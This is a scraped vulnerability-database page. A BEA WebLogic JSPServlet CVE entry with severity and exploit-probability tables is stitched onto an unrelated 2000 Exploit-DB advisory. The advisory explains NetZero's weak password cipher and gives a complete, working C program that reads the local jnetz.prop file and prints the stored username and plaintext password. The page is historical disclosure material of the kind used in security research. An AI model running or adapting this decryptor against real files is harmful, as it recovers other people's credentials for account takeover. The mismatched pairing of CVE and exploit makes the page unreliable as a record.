CPE, which stands for Common Platform Enumeration, is a standardized scheme for naming hardware, software, and operating systems. CPE provides a structured naming scheme to uniquely identify and classify information technology systems, platforms, and packages based on certain attributes such as vendor, product name, version, update, edition, and language.
CWE, or Common Weakness Enumeration, is a comprehensive list and categorization of software weaknesses and vulnerabilities. It serves as a common language for describing software security weaknesses in architecture, design, code, or implementation that can lead to vulnerabilities.
CAPEC, which stands for Common Attack Pattern Enumeration and Classification, is a comprehensive, publicly available resource that documents common patterns of attack employed by adversaries in cyber attacks. This knowledge base aims to understand and articulate common vulnerabilities and the methods attackers use to exploit them.
Services & Price
Help & Info
Search : CVE id, CWE id, CAPEC id, vendor or keywords in CVE
BEA WebLogic 5.1.x does not properly restrict access to the JSPServlet, which could allow remote attackers to compile and execute Java JSP code by directly invoking the servlet on any source file.
CVE Informations
Metrics
Metrics
Score
Severity
CVSS Vector
Source
V2
10
AV:N/AC:L/Au:N/C:C/I:C/A:C
nvd@nist.gov
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
1.21%
–
–
2022-03-27
–
–
1.21%
–
–
2022-04-03
–
–
1.21%
–
–
2022-05-08
–
–
1.21%
–
–
2022-08-28
–
–
1.21%
–
–
2023-02-26
–
–
1.21%
–
–
2023-03-12
–
–
–
1.02%
–
2023-04-02
–
–
–
1.02%
–
2024-02-11
–
–
–
1.05%
–
2024-06-02
–
–
–
1.05%
–
2024-06-02
–
–
–
1.05%
–
2024-11-17
–
–
–
1.05%
–
2024-12-22
–
–
–
0.68%
–
2025-01-19
–
–
–
0.68%
–
2025-03-18
–
–
–
–
3.53%
2025-03-30
–
–
–
–
4.37%
2025-04-06
–
–
–
–
5.2%
2025-04-06
–
–
–
–
5.2,%
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Publication date : 2000-07-17 22h00 +00:00 Author : Brian Carrier EDB Verified : Yes
// source: https://www.securityfocus.com/bid/1483/info
Netzero is a free internet service provider which requires its users to run the application ZeroPort in order to log onto the network. The username and password is stored locally in a text file called id.dat and is inadequately encrypted. The weakly encrypted username and password may also be stored in jnetz.prop if the option "Save Password" is enabled.
If a malicious user has access to the aforementioned files, they may decrypt the username and password using the exploit provided by Brian Carrier <bcarrier@atstake.com> or by using a simple substitution cipher.
Taken from the @Stake/L0pht advisory, Brian Carrier explains how to decrypt the username and password:
The classical substitution cipher is a 1-to-1 mapping between
characters where each plaintext character is replaced by one ciphertext
character. For example, let P_i be the plaintext character in location
'i' and C_j be the ciphertext character in location 'j', then C_i is the
character that P_i maps to.
The NetZero substitution cipher replaces each plaintext character by
two ciphertext characters, but the two ciphertext characters are not
stored together. When substituting character P_i of a password of length
'n', the first ciphertext character is C_i and the second character is
C_n+i.
The two ciphertext characters are derived from the following table:
| 1 a M Q f 7 g T 9 4 L W e 6 y C
--+----------------------------------
g | ` a b c d e f g h i j k l m n o
T | p q r s t u v w x y z { | } ~
f | @ A B C D E F G H I J K L M N O
7 | P Q R S T U V W X Y Z [ \ ] ^ _
Q | 0 1 2 3 4 5 6 7 8 9 : ; < = > ?
M | SP ! " # $ % & ' ( ) * + , - . /
The characters inside the table represent the ASCII plaintext characters
and SP represents a space.
When encrypting a string, P, of length 'n', find each character in the
table and place the column header into C_i and place the row header into
C_n+i.
For example:
E(a) = ag
E(aa) = aagg
E(aqAQ1!) = aaaaaagTf7QM
E(`abcdefghijklmno) = 1aMQf7gT94LWe6yCgggggggggggggggg
When decrypting a string, C, of length '2n', then P_i will be the
element in the above table where the column headed by C_i and the row
headed by C_n+i intersect.
For example:
D(af) = A
D(aaff) = AA
D(aaMMQQfgfgfg) = AaBbCc
#include <stdio.h>
#include <string.h>
#define UID_SIZE 64
#define PASS_CIPHER_SIZE 128
#define PASS_PLAIN_SIZE 64
#define BUF_SIZE 256
const char decTable[6][16] = {
{'`','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o'},
{'p','q','r','s','t','u','v','w','x','y','z','{','|','}','~',0},
{'@','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O'},
{'P','Q','R','S','T','U','V','W','X','Y','Z','[','\\',']','^','_'},
{'0','1','2','3','4','5','6','7','8','9',':',';','<','=','>','?'},
{' ','!','"','#','$','%','&','\'','(',')','*','+',',','-','.','/'}
};
int nz_decrypt(char cCipherPass[PASS_CIPHER_SIZE],
char cPlainPass[PASS_PLAIN_SIZE])
{
int passLen, i, idx1, idx2;
passLen = strlen(cCipherPass)/2;
if (passLen > PASS_PLAIN_SIZE)
{
printf("Error: Plain text array too small\n");
return 1;
}
for (i = 0; i < passLen; i++)
{
switch(cCipherPass[i])
{
case '1':
idx2 = 0; break;
case 'a':
idx2 = 1; break;
case 'M':
idx2 = 2; break;
case 'Q':
idx2 = 3; break;
case 'f':
idx2 = 4; break;
case '7':
idx2 = 5; break;
case 'g':
idx2 = 6; break;
case 'T':
idx2 = 7; break;
case '9':
idx2 = 8; break;
case '4':
idx2 = 9; break;
case 'L':
idx2 = 10; break;
case 'W':
idx2 = 11; break;
case 'e':
idx2 = 12; break;
case '6':
idx2 = 13; break;
case 'y':
idx2 = 14; break;
case 'C':
idx2 = 15; break;
default:
printf("Error: Unknown Cipher Text index: %c\n", cCipherPass[i]);
return 1;
break;
}
switch(cCipherPass[i+passLen])
{
case 'g':
idx1 = 0; break;
case 'T':
idx1 = 1; break;
case 'f':
idx1 = 2; break;
case '7':
idx1 = 3; break;
case 'Q':
idx1 = 4; break;
case 'M':
idx1 = 5; break;
default:
printf("Error: Unknown Cipher Text Set: %c\n",
cCipherPass[i+passLen]);
return 1;
break;
}
cPlainPass[i] = decTable[idx1][idx2];
}
cPlainPass[i] = 0;
return 0;
}
int main(void)
{
FILE *hParams;
char cBuffer[BUF_SIZE], cUID[UID_SIZE];
char cCipherPass[PASS_CIPHER_SIZE], cPlainPass[PASS_PLAIN_SIZE];
int done = 2;
printf("\nNet Zero Password Decryptor\n");
printf("Brian Carrier [bcarrier@atstake.com]\n");
printf("@Stake L0pht Research Labs\n");
printf("http://www.atstake.com\n\n");
if ((hParams = fopen("jnetz.prop","r")) == NULL)
{
printf("Unable to find jnetz.prop file\n");
return 1;
}
while ((fgets(cBuffer, BUF_SIZE, hParams) != NULL) && (done > 0))
{
if (strncmp(cBuffer, "ProfUID=", 8) == 0)
{
done--;
strncpy(cUID, cBuffer + 8, UID_SIZE);
printf("UserID: %s", cUID);
}
if (strncmp(cBuffer, "ProfPWD=", 8) == 0)
{
done--;
strncpy(cCipherPass, cBuffer + 8, PASS_CIPHER_SIZE);
printf("Encrypted Password: %s", cCipherPass);
if (nz_decrypt(cCipherPass, cPlainPass) != 0)
return 1;
else
printf("Plain Text Password: %s\n", cPlainPass);
}
}
fclose(hParams);
if (done > 0)
{
printf("Invalid jnetz.prop file\n");
return 1;
} else {
return 0;
}
}